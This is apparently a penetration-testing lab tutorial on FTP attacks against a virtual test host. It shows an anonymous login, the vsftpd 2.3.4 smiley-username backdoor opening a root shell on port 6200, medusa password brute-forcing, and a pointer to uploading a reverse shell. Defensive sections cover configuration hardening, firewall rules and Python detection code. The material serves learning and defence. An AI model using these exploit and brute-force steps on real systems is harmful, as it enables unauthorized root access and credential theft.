Introduction to the FTP protocol
The File Transfer Protocol (FTP) is a standard protocol for transferring files over a network and uses the client/server model. It belongs to the application layer of the network protocol stack. FTP uses port 21 for its control connection.
User types: 1. Real users 2. Administrators 3. Anonymous users
FTP transfer modes: 1. ASCII 2. Binary
Exploiting FTP anonymous login
Because the FTP server does not disable anonymous users, one can log in directly with the anonymous account. Below, nc is used to connect to the FTP server.
1. Use nmap to check port 21 and scan for vulnerabilities
➜ ~ nmap -p 21 10.0.2.5
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-08 11:11 EDT
Nmap scan report for 10.0.2.5
Host is up (0.00033s latency).
PORT STATE SERVICE
21/tcp open ftp
MAC Address: 08:00:27:87:7B:B0 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 1.12 seconds
2. Log in as the anonymous user
➜ ~ nc 10.0.2.5 21
220 (vsFTPd 2.3.4)
USER anonymous
331 Please specify the password.
PASS
230 Login successful.
HELP
214-The following commands are recognized.
ABOR ACCT ALLO APPE CDUP CWD DELE EPRT EPSV FEAT HELP LIST MDTM MKD
MODE NLST NOOP OPTS PASS PASV PORT PWD QUIT REIN REST RETR RMD RNFR
RNTO SITE SIZE SMNT STAT STOR STOU STRU SYST TYPE USER XCUP XCWD XMKD
XPWD XRMD
214 Help OK.
PWD
257 "/"
Exploiting the FTP backdoor vulnerability
Triggering the vsftpd 2.3.4 backdoor manually: during FTP authentication, if the USER name contains ":)", the server opens a shell listening for connections on port 6200.
1. Use nmap to scan for the FTP backdoor vulnerability
➜ ~ nmap --script vuln -p 21 10.0.2.5
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-08 11:41 EDT
Nmap scan report for 10.0.2.5
Host is up (0.00027s latency).
PORT STATE SERVICE
21/tcp open ftp
| ftp-vsftpd-backdoor:
| VULNERABLE:
| vsFTPd version 2.3.4 backdoor
| State: VULNERABLE (Exploitable)
| IDs: OSVDB:73573 CVE:CVE-2011-2523
| vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04.
| Disclosure date: 2011-07-03
| Exploit results:
| Shell command: id
| Results: uid=0(root) gid=0(root)
| References:
| http://osvdb.org/73573
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523
| http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
|_ https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
|_sslv2-drown:
MAC Address: 08:00:27:87:7B:B0 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 12.23 seconds
2. Use nc to trigger the vsftpd 2.3.4 backdoor vulnerability
➜ ~ nc 10.0.2.5 21
220 (vsFTPd 2.3.4)
USER user:)
331 Please specify the password.
PASS pass
Open another terminal to make use of the vulnerability
➜ ~ nmap -p 6200 10.0.2.5
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-08 12:17 EDT
Nmap scan report for 10.0.2.5
Host is up (0.00039s latency).
PORT STATE SERVICE
6200/tcp open lm-x
MAC Address: 08:00:27:87:7B:B0 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.56 seconds
➜ ~ nc 10.0.2.5 6200
id
uid=0(root) gid=0(root)
FTP security configuration
1. Edit the configuration file to disable anonymous login.
Disable anonymous users on Windows
On Linux, edit /etc/vsftpd.conf:
anonymous_enable=NO
2. Patch the specific vulnerability, or configure the firewall to block connections to the backdoor port.
iptables -A INPUT -p tcp --dport 6200 -j DROP
iptables -A OUTPUT -p tcp --sport 6200 -j DROP
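An added example (not from the original post) that audits a vsftpd.conf for the anonymous-login setting this step changes. It assumes vsftpd's documented default of anonymous_enable=YES when the key is absent, and goes beyond the step by also checking the anon_upload_enable and anon_mkdir_write_enable options; the configuration text is constructed.

```python
# vsftpd's compiled-in defaults for the anonymous-access options (per the vsftpd
# man page; anonymous_enable defaults to YES, so a missing key means "allowed").
DEFAULTS = {
    "anonymous_enable": "YES",
    "anon_upload_enable": "NO",
    "anon_mkdir_write_enable": "NO",
}

# Constructed configuration text, not taken from a real host.
# Note the commented-out anonymous_enable line: it does NOT disable anonymous login.
SAMPLE_CONF = """\
# vsftpd.conf
listen=YES
#anonymous_enable=NO
anon_upload_enable=YES
local_enable=YES
"""

def parse_vsftpd_conf(text):
    """Parse key=value lines; blank lines and lines starting with '#' are ignored."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        settings[key.strip()] = value.strip()
    return settings

def audit_vsftpd_conf(text):
    """Return (option, effective_value, problem) tuples for risky anonymous settings."""
    settings = parse_vsftpd_conf(text)
    # Apply vsftpd's defaults so an absent option is judged by its real effect.
    effective = {k: settings.get(k, DEFAULTS[k]).upper() for k in DEFAULTS}
    problems = []
    if effective["anonymous_enable"] != "NO":
        problems.append(("anonymous_enable", effective["anonymous_enable"],
                         "anonymous login allowed; set anonymous_enable=NO"))
    for key in ("anon_upload_enable", "anon_mkdir_write_enable"):
        if effective[key] == "YES":
            problems.append((key, "YES", "anonymous users may write; set %s=NO" % key))
    return problems

if __name__ == "__main__":
    for option, value, problem in audit_vsftpd_conf(SAMPLE_CONF):
        print("%s=%s: %s" % (option, value, problem))
```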
Brute-forcing FTP usernames and passwords
List the cracking modules that medusa supports
➜ ~ medusa -d
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
Available modules in "." :
Available modules in "/usr/lib/x86_64-linux-gnu/medusa/modules" :
+ cvs.mod : Brute force module for CVS sessions : version 2.0
+ ftp.mod : Brute force module for FTP/FTPS sessions : version 2.1
+ http.mod : Brute force module for HTTP : version 2.1
+ imap.mod : Brute force module for IMAP sessions : version 2.0
+ mssql.mod : Brute force module for M$-SQL sessions : version 2.0
+ mysql.mod : Brute force module for MySQL sessions : version 2.0
+ nntp.mod : Brute force module for NNTP sessions : version 2.0
+ pcanywhere.mod : Brute force module for PcAnywhere sessions : version 2.0
+ pop3.mod : Brute force module for POP3 sessions : version 2.0
+ postgres.mod : Brute force module for PostgreSQL sessions : version 2.0
+ rexec.mod : Brute force module for REXEC sessions : version 2.0
+ rlogin.mod : Brute force module for RLOGIN sessions : version 2.0
+ rsh.mod : Brute force module for RSH sessions : version 2.0
+ smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 2.1
+ smtp-vrfy.mod : Brute force module for verifying SMTP accounts (VRFY/EXPN/RCPT TO) : version 2.1
+ smtp.mod : Brute force module for SMTP Authentication with TLS : version 2.0
+ snmp.mod : Brute force module for SNMP Community Strings : version 2.1
+ ssh.mod : Brute force module for SSH v2 sessions : version 2.1
+ svn.mod : Brute force module for Subversion sessions : version 2.1
+ telnet.mod : Brute force module for telnet sessions : version 2.0
+ vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 2.0
+ vnc.mod : Brute force module for VNC sessions : version 2.1
+ web-form.mod : Brute force module for web forms : version 2.1
+ wrapper.mod : Generic Wrapper Module : version 2.0
Use medusa to brute-force FTP
➜ ~ medusa -h 10.0.2.5 -U /root/Desktop/UserAndPass -P /root/Desktop/UserAndPass -M ftp
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
ACCOUNT CHECK: [ftp] Host: 10.0.2.5 (1 of 1, 0 complete) User: admin (1 of 4, 0 complete) Password: admin (1 of 4 complete)
ACCOUNT CHECK: [ftp] Host: 10.0.2.5 (1 of 1, 0 complete) User: admin (1 of 4, 0 complete) Password: msfadmin (2 of 4 complete)
ACCOUNT CHECK: [ftp] Host: 10.0.2.5 (1 of 1, 0 complete) User: admin (1 of 4, 0 complete) Password: root (3 of 4 complete)
ACCOUNT CHECK: [ftp] Host: 10.0.2.5 (1 of 1, 0 complete) User: admin (1 of 4, 0 complete) Password: toor (4 of 4 complete)
ACCOUNT CHECK: [ftp] Host: 10.0.2.5 (1 of 1, 0 complete) User: msfadmin (2 of 4, 1 complete) Password: admin (1 of 4 complete)
ACCOUNT CHECK: [ftp] Host: 10.0.2.5 (1 of 1, 0 complete) User: msfadmin (2 of 4, 1 complete) Password: msfadmin (2 of 4 complete)
ACCOUNT FOUND: [ftp] Host: 10.0.2.5 User: msfadmin Password: msfadmin [SUCCESS]
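As an added example, not part of the original post, the following detection logic reads an FTP control-channel transcript such as the nc sessions above and flags the conditions shown in the anonymous-login, backdoor and brute-force sections: a vsFTPd 2.3.4 banner, a USER value containing ":)", a successful anonymous login, and repeated 530 failures. The transcript and the "cli>"/"srv>" line prefixes are constructed.

```python
# Constructed FTP control-channel transcript (not a real capture);
# "cli>" lines are client commands, "srv>" lines are server replies.
SAMPLE_SESSION = """\
srv> 220 (vsFTPd 2.3.4)
cli> USER anonymous
cli> PASS
srv> 230 Login successful.
cli> USER admin
cli> PASS admin
srv> 530 Login incorrect.
cli> USER admin
cli> PASS root
srv> 530 Login incorrect.
cli> USER admin
cli> PASS toor
srv> 530 Login incorrect.
cli> USER user:)
cli> PASS pass
"""

BACKDOOR_VERSION = "vsFTPd 2.3.4"   # release carrying the CVE-2011-2523 backdoor
FAIL_THRESHOLD = 3                   # 530 replies before the session is flagged as brute force

def analyze_ftp_session(text, fail_threshold=FAIL_THRESHOLD):
    """Return the list of findings for one FTP control-channel transcript."""
    findings, last_user, failures = [], None, 0
    for line in text.splitlines():
        side, _, msg = line.partition("> ")
        if side == "srv":
            if msg.startswith("220") and BACKDOOR_VERSION in msg:
                findings.append("backdoored-banner")
            elif msg.startswith("230") and (last_user or "").lower() in ("anonymous", "ftp"):
                findings.append("anonymous-login-success")
            elif msg.startswith("530"):
                failures += 1
        elif side == "cli":
            verb, _, arg = msg.partition(" ")
            if verb.upper() == "USER":
                last_user = arg
                if ":)" in arg:   # the smiley that makes 2.3.4 open its 6200/tcp shell
                    findings.append("vsftpd-backdoor-trigger")
    if failures >= fail_threshold:
        findings.append("brute-force:%d-failures" % failures)
    return findings

if __name__ == "__main__":
    for finding in analyze_ftp_session(SAMPLE_SESSION):
        print(finding)
```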
Sniffing FTP usernames and cleartext passwords
During FTP authentication, the client and server exchange information in cleartext. Verify that the username and password are transmitted in cleartext during FTP login.
FTP cleartext transmission
1. Use arpspoof for ARP spoofing, then capture the traffic with Wireshark.
Not tested successfully. To be verified.
What to do after logging in to FTP
Use Metasploit to create a reverse shell and upload it to the FTP server. setoolkit can also be used to generate a reverse shell quickly. See the article 《Metasploit实战:FTP漏洞利用》 (Metasploit in Practice: FTP Exploitation).